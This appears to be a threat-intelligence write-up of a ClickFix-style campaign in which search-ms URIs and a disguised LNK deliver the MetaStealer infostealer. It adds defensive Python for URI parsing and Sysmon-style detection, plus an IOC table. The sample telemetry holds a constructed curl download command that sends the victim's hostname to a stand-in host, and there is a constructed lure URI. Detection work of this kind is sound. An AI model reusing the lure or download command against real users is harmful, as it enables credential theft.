Threat Actors Exploit Windows Search in AnyDesk ClickFix Attack to Spread MetaStealer
In a novel twist on the year-long trend of ClickFix scams, threat actors have blended human-verification social engineering with the Windows search protocol to deliver MetaStealer, a commodity infostealer notorious for harvesting credentials and exfiltrating sensitive files.
While the attack superficially resembles classic ClickFix and FileFix techniques, its unique infection chain—from a fake AnyDesk installer to an MSI package disguised as a PDF—underscores the evolving sophistication of “fix” variants.
The attack begins when a target searching for the legitimate AnyDesk remote-access tool lands on anydeesk[.]ink/download/anydesk.html, a phishing page featuring a faux Cloudflare Turnstile human-verification prompt.

The page’s obfuscated JavaScript, once deobfuscated, redirects victims to verification.anydeesk[.]ink/reCAPTCHA-v2.php, where clicking the verification box hands a search-ms URI to Windows File Explorer instead of the PowerShell or Run-dialog execution common in ClickFix campaigns.
Instead of instructing users to paste code into the Run dialog (ClickFix) or the File Explorer address bar (FileFix), the phishing page leverages the search-ms URI scheme, which lets a web page launch a Windows Search query in Explorer; the URI’s displayname parameter sets the title shown for that query, so the attacker controls what the victim sees.

When victims click “verify,” the browser passes the search-ms URI to Windows File Explorer, which automatically opens a custom search titled by the URI’s displayname parameter.
The search location is an attacker-controlled SMB share, so Explorer silently connects to it and presents the victim with what appears to be a PDF named Readme AnyDesk.pdf.
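To make the mechanism concrete, the following is an added example (not code from the report or from the campaign) that parses a search-ms URI the way Explorer reads it and flags one whose search location is a remote share. The format is search-ms:query=<terms>&crumb=location:<path>&displayname=<title>; Explorer lists the contents of the location crumb and titles the window with displayname. The sample URIs, the share host files.example.net and the internal allow-list are constructed for the example.

```python
# Added example, not taken from the report: parse a search-ms: URI of the kind
# the lure hands to Explorer and flag ones whose search location is a remote share.
#
# Format: search-ms:query=<terms>&crumb=location:<path>&displayname=<title>
# Explorer lists the contents of each location crumb and titles the window with
# displayname, so the victim sees an attacker-chosen title over an attacker-chosen share.
# The sample URIs, the host files.example.net and the allow-list below are constructed.
import ipaddress
import re
from urllib.parse import unquote

# Assumed: hosts that are legitimately searched over SMB in this environment.
INTERNAL_HOST_ALLOWLIST = {"fileserver01", "corp-dfs"}

# Only RFC 1918, loopback and link-local ranges count as internal here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_search_ms(uri):
    """Split a search-ms URI into displayname, query and (crumb type, crumb value) pairs."""
    if not uri.lower().startswith("search-ms:"):
        raise ValueError("not a search-ms URI")
    parsed = {"displayname": None, "query": None, "crumbs": []}
    for part in uri[len("search-ms:"):].split("&"):
        key, sep, value = part.partition("=")
        if not sep:
            continue
        key, value = key.lower(), unquote(value)
        if key == "crumb":
            ctype, _, cval = value.partition(":")  # e.g. location:\\host\share
            parsed["crumbs"].append((ctype.lower(), cval))
        elif key in ("displayname", "query"):
            parsed[key] = value
    return parsed


def unc_host(path):
    """Return the host of a \\host\share path (WebDAV forms like \\host@SSL\... included), else None."""
    m = re.match(r"^\\\\([^\\]+)", path)
    return m.group(1).split("@")[0] if m else None


def is_external(host):
    """True if the host is neither an allow-listed name nor an internal IP address."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() not in INTERNAL_HOST_ALLOWLIST
    return not any(addr in net for net in INTERNAL_NETS)


def assess(uri):
    """Return the parsed URI and a list of findings for location crumbs on external hosts."""
    parsed = parse_search_ms(uri)
    findings = []
    for ctype, cval in parsed["crumbs"]:
        host = unc_host(cval) if ctype == "location" else None
        if host and is_external(host):
            findings.append(f"search location is a remote share on {host} "
                            f"(window titled {parsed['displayname']!r})")
    return parsed, findings


# Constructed lure: displayname is what the victim sees, the crumb is where Explorer looks.
SAMPLE_LURE = ("search-ms:query=Readme&crumb=location:%5C%5Cfiles.example.net%5Cpublic"
               "&displayname=Download%20AnyDesk")
SAMPLE_BENIGN = "search-ms:query=*&crumb=location:%5C%5Cfileserver01%5Cshared&displayname=Shared"

if __name__ == "__main__":
    for uri in (SAMPLE_LURE, SAMPLE_BENIGN):
        parsed, findings = assess(uri)
        print(parsed["displayname"], "->", findings or "no findings")
```

The same parser can be run over proxy or browser-history logs: any search-ms URI whose location crumb resolves to a host outside the allow-list is worth an alert, whatever the displayname says.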
Disguised LNK Shortcut Snags Hostnames
Behind the guise of a PDF lies a malicious Windows shortcut (LNK) file. When opened, the shortcut’s target command performs two actions: it silently downloads the legitimate AnyDesk installer via Microsoft Edge, likely to convince the user that a genuine application is installing, and fetches a so-called “PDF” from chat1[.]store into a temporary directory.

Crucially, the download URL for that “PDF” embeds the victim’s %COMPUTERNAME% environment variable, so the attacker’s server records each victim’s hostname at the moment of download without any per-campaign configuration.
Analysis of the chat1[.]store server, fetched with a curl user agent, revealed the full MSI package. Inside, a CustomActionDLL and a compressed CAB archive (Binary.bz.WrappedSetupProgram) unpack to two key malicious components: a cleanup JavaScript (1.js) and ls26.exe, the MetaStealer dropper.
In classic ClickFix lures the “solution” is copying and pasting a command fed to victims via an attacker-controlled prompt; here, clicking the fake verification box and then the fake PDF quietly kicks off the attack chain.
Protected with Private EXE Protector, ls26.exe behaves identically to known MetaStealer samples, scanning for browser credentials, crypto-wallet files, and document stores before exfiltration.
Although this attack shares common elements with traditional ClickFix and FileFix lures—namely, social engineering prompts disguised as CAPTCHA—the shift to search-ms URIs and SMB shares marks a significant evolution.
Unlike ClickFix, which coaxes users to paste commands into the Run dialog, and FileFix, which has them paste into the File Explorer address bar, the new variant blunts user suspicion by installing the familiar AnyDesk remote-access tool alongside the malicious installer.
Defensive Measures and User Education
Organizations that have mitigated classic ClickFix threats by disabling or restricting the Windows Run dialog may still be vulnerable to search-ms-based lures. To bolster defenses:
- Enforce strict application control (for example AppLocker or WDAC allow-listing) to block unauthorized script execution and MSI installations from user-writable directories such as %TEMP%.
- Restrict the search-ms protocol handler and block outbound SMB (TCP 445) to untrusted networks, so Explorer cannot enumerate attacker-controlled shares.
- Educate users to question unsolicited CAPTCHAs or verification prompts that request any level of command execution or file opening.
- Deploy endpoint detection rules to flag unexpected msiexec.exe launches, shells spawned by explorer.exe that download files (the LNK’s behaviour here), and SMB connections to unfamiliar external hosts.
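The detection bullet above, as an added example that is not part of the report: the ideas expressed as rules over Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events. The events, hosts and paths are constructed placeholders; the only real indicator is the C2 IP from the IOC table below.

```python
# Added example, not part of the report: the detection ideas in the list above as
# rules over Sysmon-style events (EventID 1 = process creation, EventID 3 = network
# connection). The events below are constructed; hosts and paths are placeholders,
# except the C2 IP, which comes from the report's IOC table.
import ipaddress
import json
import re

C2_IPS = {"38.134.148.74"}  # MetaStealer C2 IP from the IOC table
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
TEMP_PATH = re.compile(r"\\(?:temp|tmp)\\", re.I)
URL = re.compile(r"https?://", re.I)


def is_internal_ip(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def image_name(ev, field="Image"):
    """Lower-cased file name of an Image/ParentImage path."""
    return ev.get(field, "").rsplit("\\", 1)[-1].lower()


def rule_msiexec_from_temp(ev):
    """msiexec.exe installing a package that sits in a temp directory."""
    if ev.get("EventID") == 1 and image_name(ev) == "msiexec.exe" \
            and TEMP_PATH.search(ev.get("CommandLine", "")):
        return "msiexec.exe launched with a package from a temp directory"
    return None


def rule_shortcut_spawned_downloader(ev):
    """A shell started by explorer.exe (how an LNK target runs) whose command line fetches a URL."""
    if ev.get("EventID") == 1 and image_name(ev, "ParentImage") == "explorer.exe" \
            and image_name(ev) in ("cmd.exe", "powershell.exe", "curl.exe"):
        cl = ev.get("CommandLine", "")
        if URL.search(cl) or "%COMPUTERNAME%" in cl.upper():
            return "explorer.exe spawned a shell that downloads from a URL"
    return None


def rule_external_smb(ev):
    """SMB (TCP 445) to a host outside the internal ranges, as a search-ms lure causes."""
    if ev.get("EventID") == 3 and ev.get("DestinationPort") == 445 \
            and not is_internal_ip(ev["DestinationIp"]):
        return f"SMB connection to external host {ev['DestinationIp']}"
    return None


def rule_known_c2(ev):
    """Any connection to an IP from the IOC table."""
    if ev.get("EventID") == 3 and ev.get("DestinationIp") in C2_IPS:
        return f"connection to known MetaStealer C2 {ev['DestinationIp']}"
    return None


RULES = [rule_msiexec_from_temp, rule_shortcut_spawned_downloader, rule_external_smb, rule_known_c2]


def run_rules(events):
    """Return (event index, rule name, message) for every rule that fires."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                alerts.append((i, rule.__name__, msg))
    return alerts


# Constructed sample telemetry (JSON, so the backslashes read as Sysmon would log them).
SAMPLE_EVENTS = json.loads(r"""[
 {"EventID": 1, "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\explorer.exe",
  "CommandLine": "msiexec.exe /i \\\\fileserver01\\software\\7zip.msi /qn"},
 {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
  "CommandLine": "cmd.exe /c curl -o %TEMP%\\Readme.pdf https://download.example.net/%COMPUTERNAME%"},
 {"EventID": 1, "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
  "CommandLine": "msiexec.exe /i C:\\Users\\jdoe\\AppData\\Local\\Temp\\Readme.pdf /qn"},
 {"EventID": 3, "Image": "System", "DestinationIp": "203.0.113.10", "DestinationPort": 445},
 {"EventID": 3, "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\ls26.exe",
  "DestinationIp": "38.134.148.74", "DestinationPort": 443},
 {"EventID": 3, "Image": "System", "DestinationIp": "10.0.0.5", "DestinationPort": 445}
]""")

if __name__ == "__main__":
    for idx, name, msg in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {msg}")
```

The benign first and last events (an MSI from an internal share, SMB to an internal host) produce no alert; the chain in the middle trips one rule at each stage, which is the point of layering them rather than relying on a single indicator.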
As threat actors continue to refine “fix”-style attacks, blending legitimate features with social engineering will remain a potent evasion tactic. Vigilant user training and layered technical controls are essential to detect and disrupt these evolving infection chains before they deliver infostealers like MetaStealer.
IOCs
Indicator | Description
https[://]anydeesk[.]ink/download/anydesk[.]html | Phishing page with fake Cloudflare Turnstile
macawiwmaacckuow[.]xyz | MetaStealer C2 domain
yeosyyyaewokgioa[.]xyz | MetaStealer C2 domain
cmqsqomiwwksmcsw[.]xyz | MetaStealer C2 domain
38[.]134[.]148[.]74 | MetaStealer C2 IP address
ls26.exe, SHA256 0fc76b7f06aa80a43abafc1e9b88348734e327feb306d700c877c6a210fbd5e7 | MetaStealer dropper PE
CustomActionDLL, SHA256 fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1 | File found in MSI package
Binary.bz.WrappedSetupProgram, SHA256 513992d7076984d5c5a42affc12b6a00eef820f3254af75c9958ef3310190317 | CAB file containing malicious components